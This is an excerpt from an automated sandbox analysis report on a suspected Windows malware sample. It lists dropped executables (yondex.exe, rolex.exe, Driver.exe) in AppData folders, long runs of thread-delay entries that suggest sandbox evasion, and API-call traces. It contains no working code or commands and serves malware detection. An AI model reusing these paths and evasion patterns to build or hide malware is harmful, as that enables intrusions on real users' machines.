                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -592937s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -592820s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -592672s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -592515s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -592375s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -592234s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -592098s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -591922s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -591783s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -591640s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -591469s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -591312s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -591186s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -591047s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -590911s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -590777s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -590653s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -590530s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -590390s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -590250s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -590109s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -589993s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -589859s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -589723s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -589585s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -589437s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -589281s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -589156s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -589026s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -588901s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -588763s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -588621s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -588475s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -588337s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -588210s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -588071s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -587943s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -587781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -587625s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -587484s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -587328s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -587202s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -587047s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -586906s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -586778s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -586609s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -586437s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -586286s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -586154s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -586015s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -585875s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -585719s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -585578s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -585437s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -585094s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -584903s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -584765s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -584647s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -584509s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -584346s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -584203s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -584062s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -583908s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -583750s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -583621s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -583498s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -583359s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -583204s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -583047s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -582781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -582645s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -582500s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -582359s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -582203s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -582070s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -581922s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -581781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -581625s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -581490s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -581344s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -581203s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -581086s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -580945s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -580797s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -580656s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -580526s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -580400s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -580258s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -580109s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -579984s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -579844s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -579708s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -579547s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -579424s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -579297s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -579160s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -579005s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -578868s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -578731s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -578578s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -578449s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -578322s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -578186s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -578060s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -577934s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -577804s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -577659s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -577515s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -577368s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -577234s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -577078s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -576960s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -576781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -576651s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -576499s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -576344s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -576187s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -576054s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -575890s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -575765s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -575634s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -575487s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -575328s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -575218s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -575078s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -574951s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -574812s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -574681s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -574531s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -574394s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -574258s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -574078s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -573920s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -573781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -573646s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -573510s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -573362s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -573219s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -573064s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -572922s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -572791s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -572659s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -572500s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -572377s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -572236s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -572107s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -571980s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -571844s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -571712s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -571578s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -571422s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -571285s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -571154s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -571026s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -570875s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -570760s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -570616s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -570471s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -570328s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -570182s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -570047s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -569891s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -569750s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -569594s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -569464s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -569328s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -569203s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -569062s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -568922s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -568756s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -568620s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -568469s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -568328s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -568198s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -568071s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -567937s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -567801s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -567668s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -567531s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -567404s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -567275s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8188 Thread sleep count: 2391 > 30
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168 Thread sleep count: 486 > 30
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe Last function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe Last function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Last function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Last function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Last function: Thread delayed
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exe File Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe File Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exe Code function: 0_2_00007FF65594B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF65594B190
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exe Code function: 0_2_00007FF6559340BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6559340BC
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exe Code function: 0_2_00007FF65595FCA0 FindFirstFileExA,0_2_00007FF65595FCA0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe Code function: 3_2_00007FF7AB4A40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF7AB4A40BC
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe Code function: 3_2_00007FF7AB4BB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF7AB4BB190
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe Code function: 3_2_00007FF7AB4CFCA0 FindFirstFileExA,3_2_00007FF7AB4CFCA0
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exe Code function: 0_2_00007FF6559516A4 VirtualQuery,GetSystemInfo,0_2_00007FF6559516A4
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 587625
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 587484
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 587328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 587202
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 587047
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 586906
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 586778
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 586609
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 586437
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 586286
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 586154
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 586015
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 585875
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 585719
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 585578
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 585437
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 585094
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 584903
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 584765
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 584647
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 584509
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 584346
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 584203
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 584062
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 583908
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 583750
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 583621
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 583498
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 583359
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 583204
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 583047
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 582781
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 582645
